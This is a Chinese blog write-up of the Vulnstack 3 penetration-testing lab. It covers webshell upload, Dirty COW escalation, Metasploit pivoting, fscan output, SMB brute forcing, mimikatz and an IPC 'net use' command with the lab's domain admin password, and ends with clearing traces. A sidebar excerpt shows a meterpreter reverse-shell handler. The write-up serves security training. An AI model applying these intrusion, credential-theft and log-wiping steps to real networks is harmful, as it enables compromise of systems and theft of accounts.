vulnstack红日-三

已于 2024-07-07 16:29:29 修改
阅读量385 收藏 1
点赞数 1
分类专栏: Web安全学习篇 文章标签: 学习
于 2022-07-06 23:30:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49656607/article/details/125649486
版权 
最近在慢慢学习内网的东西,也看了一些关于内网渗透的红队文章和技巧,

看的再多也还是要实操一下,所以找了个红日的靶场做一做,人很菜,主要还是学习嘛

想试试的也可以来试试,搞清楚了回头看也不难嘛

链接:https://pan.baidu.com/s/1R4XDmS5cmY5VJS_ucp-lDg 
提取码:hx64

网络环境准备

在这里插入图片描述
解释一下,这里是用的vmnet1充当连接公网的网卡,vmnet2充当内网的网卡。

所以攻击机kali 是通过连接vmnet1,然后逐步陷入内网拿下域控

下面开始

在这里插入图片描述
在这里插入图片描述
前面就做的快一点,因为网站上没什么东西,很简单的一个网站。

robots.txt 发现敏感信息
在这里插入图片描述
configuration.php~下找到敏感数据库泄露
在这里插入图片描述
Navicat直接连上来了
在这里插入图片描述
在这里插入图片描述
因为是靶机嘛,所以就想去John大法,去爆破,好家伙是密码本不够强大啊
在这里插入图片描述
在这里插入图片描述
害,直接初始化应该是最快的方法了,可以进到后台了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到回显,下面就写个一句话马
在这里插入图片描述
在这里插入图片描述
被禁用命令了
在这里插入图片描述
蚁剑插件bypass掉就行,貌似存在内网
在这里插入图片描述
找到可疑账号密码,前面扫了端口,只开放了80,22,3306,所以大胆点试一下ssh,登上了
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
别说,这个版本的Linux内核可以尝试一下脏牛提个权
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

重头戏(进入内网)

在这里插入图片描述
session 给到 MSF
在这里插入图片描述
生成的代码在Centos下执行,拿到session
在这里插入图片描述
添加路由建立联系,Route add 网段 子网掩码 session
在这里插入图片描述
socks5代理,搭建隧道
在这里插入图片描述
生成的脚本传到要代理的服务器
在这里插入图片描述
设置proxychains代理

Vim /etc/proxychains4.conf
Socks5 127.0.0.1 1080

内网隧道搭建完毕,下面开始上才艺

内网主机发现

# 针对windows use auxiliary/scanner/smb/smb_version

# 针对linux use auxiliary/scanner/discovery/arp_sweep

直接上大杀器fscan也行,哈哈哈

└─$ proxychains ./fscan_amd64 -h 192.168.93.0/24
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.0
start infoscan
已完成 0/0 listen ip4:icmp 0.0.0.0: socket: operation not permitted
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.93.1    is alive
(icmp) Target 192.168.93.20   is alive
(icmp) Target 192.168.93.30   is alive
(icmp) Target 192.168.93.10   is alive
(icmp) Target 192.168.93.100  is alive
(icmp) Target 192.168.93.120  is alive
[*] Icmp alive hosts len is: 6
192.168.93.20:1433 open
192.168.93.30:445 open
192.168.93.1:139 open
192.168.93.20:80 open
192.168.93.1:445 open
192.168.93.10:139 open
192.168.93.10:135 open
192.168.93.30:139 open
192.168.93.30:135 open
192.168.93.120:80 open
192.168.93.20:139 open
192.168.93.20:135 open
192.168.93.20:445 open
192.168.93.10:445 open
192.168.93.1:80 open
192.168.93.120:22 open
192.168.93.100:80 open
192.168.93.100:22 open
192.168.93.1:135 open
192.168.93.100:3306 open
192.168.93.120:3306 open
192.168.93.10:88 open
[*] alive ports len is: 22
start vulscan
[+] NetInfo:
[*]192.168.93.30
   [->]win7
   [->]192.168.93.30
[*] 192.168.93.10  [+]DC TEST\WIN-8GA56TNV3MV   Windows Server 2012 R2 Datacenter 9600
[*] 192.168.93.10  (Windows Server 2012 R2 Datacenter 9600)
[+] NetInfo:
[*]192.168.93.10
   [->]WIN-8GA56TNV3MV
   [->]192.168.93.10
[*] 192.168.93.30  (Windows 7 Professional 7601 Service Pack 1)
[*] 192.168.93.30        __MSBROWSE__\WIN7              Windows 7 Professional 7601 Service Pack 1
[*] 192.168.93.20        TEST\WIN2008           Windows Server (R) 2008 Datacenter 6003 Service Pack 2
[+] NetInfo:
[*]192.168.93.20
   [->]win2008
   [->]192.168.93.20
[*] 192.168.93.20  (Windows Server (R) 2008 Datacenter 6003 Service Pack 2)
[*] WebTitle:http://192.168.93.20      code:404 len:315    title:Not Found
[+] mysql:192.168.93.100:3306:root 123
[+] mysql:192.168.93.120:3306:root 123
[*] WebTitle:http://192.168.93.100     code:200 len:16020  title:Home
[*] WebTitle:http://192.168.93.120     code:200 len:16020  title:Home
已完成 20/22 [-] ssh 192.168.93.100:22 root P@ssw0rd ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 20/22 [-] ssh 192.168.93.120:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 20/22 [-] ssh 192.168.93.100:22 admin admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 20/22 [-] ssh 192.168.93.120:22 admin abc123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 22/22
[*] 扫描结束,耗时: 5m1.823955141s     

内网段扫到5台主机存活,正好对应我们的5台靶机
(icmp) Target 192.168.93.20   is alive	win2008	域TEST
1433  80  139  445  135  139  
(icmp) Target 192.168.93.30   is alive  win7		非域
445  139  135  
(icmp) Target 192.168.93.10   is alive	win2012	TEST域控
139  135  445  88
(icmp) Target 192.168.93.100  is alive  centos
80  22  3306
(icmp) Target 192.168.93.120  is alive  ubuntu
80  22  3306
[+] mysql:192.168.93.100:3306:root 123
[+] mysql:192.168.93.120:3306:root 123

Centos和ubuntu服务是一样的,对应了前面的网络拓扑图,用NGINX反向代理来提高网站性能,所以不管他了,重点放那三台win主机上。

都开着445端口,就都试了试能不能直接永恒之蓝拿下,得,一个都不行

行吧,换个方式,直接爆破弱口令
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
还真拿到两台机子,现在尝试从win2008出发去拿域控win2012

先登录smb服务的session
在这里插入图片描述
在这里插入图片描述
不浪费时间了,直接传mimikatz
在这里插入图片描述
在这里插入图片描述
抓到域里两台机子密码
在这里插入图片描述
在这里插入图片描述
发现域控 administrator|zxcASDqw123!!

IPC横向移动

net use \\192.168.93.10\ipc$ "zxcASDqw123!!" /user:TEST\administrator
在这里插入图片描述
在这里插入图片描述
拿到flag,到这就结束了

在实战环境中,拿到域控往往还会留个后门,msf监听着,拿到域控的session,然后整个定时任务啥的,持久性控制着这个内网段的所有机器

这里就不整了

最后删除掉ipc和mimikatz记录跑路
在这里插入图片描述
在这里插入图片描述

paidx0
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
05-27
(14条消息) 红日安全vulnstack-ATT&CK实战系列 红队实战(一)_Ys3ter的博客-CSDN博客.html
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日靶场】vulnstack3-完整渗透过程
信安是不可或缺的一部分!
10-07 757
绕过:https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD。现在做内网穿透将这台主机代理出来:我测试我这有问题(我的环境有安全设备拦截了msf的流量)再次横向到30主机:(失败)443gg了,应该是授权的问题,这个win7太久没用了激活掉了。脏牛:https://github.com/Rvn0xsy/linux_dirty。还有其他方式可以横向这个看自己爱好,这次先到这,拿到后可以权限维持,这里不在赘述。
vulnstack-3渗透笔记
weixin_54855337的博客
03-22 248
后面就是通过每一台的win跳板,迁移进程位数对的进程,然后读取使用mimikatz读取hash,最后发现域管理员的账户凭证,但是测试发现两台win靶机都只能读取hash并不能读取文明,标准流程就是在win靶机上面获取到了域管的凭证,然后直接拿win靶机当跳板机,psexec或者wmic进行横向。查看ip发现这台机子位93段的,而不是一开始4段的,判断可能使用了反向代理,将192.168.93.120的80端口转发到了192.168.4.52的80。尝试进行后台登陆,账号为admin2密码为secret。
ssh错误 server not ready for puppeth err=“ssh: handshake failed: ssh: unable to authenticate... 解决方法
whatday的专栏
11-11 2908
原因:密码错误 问题分析 在编译go-ethereum之后使用puppeth创建私链后,在绑定用户的时候,会出现以下错误: What’s the login password for root at root@192.168.79.189? (won’t be echoed) ERROR[03-19|13:52:52.594] Server not ready for puppeth err=“ssh: handshake failed: ssh: unable to authenticate, at
Server not ready for puppeth err="ssh: handshake failed: ssh: unable to authenticate...错误解决
qq_36651243的博客
03-19 1万+
问题分析 在编译go-ethereum之后使用puppeth创建私链后,在绑定用户的时候,会出现以下错误: What’s the login password for root at root@192.168.79.189? (won’t be echoed) ERROR[03-19|13:52:52.594] Server not ready for puppeth er...
红日vulnstack)3 内网渗透ATT&CK实战
m0_66299232的博客
03-11 1682
蚁剑成功连接后无法执行命令,disable_functions插件,权限提升-脏牛漏洞,用msfvenom生成木马文件,msf开启监听,执行木马文件,成功反弹shell到msf上 use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.106 set LPORT 1106 run 使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破
红日AI安全-基于机器学习的攻击检测系统1
08-04
红日AI安全-基于机器学习的攻击检测系统1】主要关注的是如何运用机器学习技术来构建一个能够检测多种攻击类型的系统,特别是SQL注入和一般网络攻击。该系统的实现涉及了特征提取、数据集构建、多种机器学习算法的...
红日机械厂诊断分析报告-龙马管理咨询.pdf
09-30
3. **债务状况分析**: - 债务来源结构揭示了债务主要来自银行、其他国有企业、私营企业和内部职工,明确了债务构成。 - 借款条件结构则分析了不同类型的借款(担保、抵押和信用),以及各自所占的比重,这些信息...
2020年红日安全星火沙龙PPT.zip
02-25
《2020年红日安全星火沙龙PPT》是一个关于网络安全的专题研讨会资料集,其中包含了多个主题演讲的PDF文件。这个压缩包揭示了一系列关键的网络安全领域知识点,包括但不限于: 1. **Dotnet Hacking & Detection** - ...
vulnstack3
最新发布
m0_70782241的博客
02-21 1414
利用PTH攻击域控服务器
ATT&CK 实战 - 红日安全 vulnstack)渗透记录
daxi0ng的博客
12-02 2678
1、大概拓扑用一下先知老哥这个图。我加了一个攻击机kail 192.168.1.128 https://xz.aliyun.com/t/6988 渗透过程: 话说我下载下来centos就是root权限登录状态。不过测试流程还是要的。 1、用msf测了一下版本 2、跑一下端口 3、跑一下目录,发现配置文件的备份文件 4、登陆一下数据库 5、查看一下密码,加密的,并且没有权限改密文。 6、joomla后台漏洞比较多的,所以想着添加一个管理员进后台。正好官方文档就有.
vulnstack红日靶场复现
BuNahua的博客
09-01 1175
说明:如您在读这篇复现中,有任何问题,欢迎vx:Bestboysendit 交流 目录: 一、环境配置 二、外网测试: 、获取会话: 01信息收集 0201获取会话-msf 0201获取会话-cs 四、内网渗透: 五、参考链接: 打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。 挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。 除重新获取ip,不建议进行任何虚拟机操作。 参考虚拟机网络配置,添加新的网络,该网络作为内部网络。 c
VulnStack-ATT&CK-3
weixin_46686336的博客
11-14 311
红日靶场进行安全测试
Linux - SSH远程连接的返回信息
专注数据库、大数据领域干货分享,用严谨的数据技术广交天下朋友。
10-21 2071
采用SSH的方式远程连接到服务...
ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password]
热门推荐
空山新雨后,天气晚来秋
08-26 3万+
执行ssh操作连接服务器报这个错,找了一会没找到原因,后来才发现是密码不正确,密码写对就好了。 酌贪泉而觉爽,处涸辙以犹欢。
红日靶机vulnstack03【半总结】
qq_45300786的博客
10-04 526
ip就不说了,和前面差不多,都是2个网段。 打开centos 把里面所有的ip都该成ubuntu的ip,因为ubuntu才是真正的服务器,centos只是nginx反向代理服务器 改了后,记得重启nginx服务 nginx -s reload 攻略教程如下: 红日安全ATT&CK靶机实战系列之vulnstack3 VulnStack-ATT&CK-3(红日靶场) ...
scaner 从外网到内网域渗透
qq_53742230的博客
09-05 9918
渗透测试项目从外网到内网域渗透
红日靶场VulnStack1
10-08
对于红日靶场VulnStack1,我了解到它是一个虚拟机中的漏洞靶场。这个靶场主要用于学习和实践网络安全方面的知识,其中包含了一些常见的漏洞,供用户进行渗透测试和漏洞攻击的实战练习。 由于我是一个AI模型,并没有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值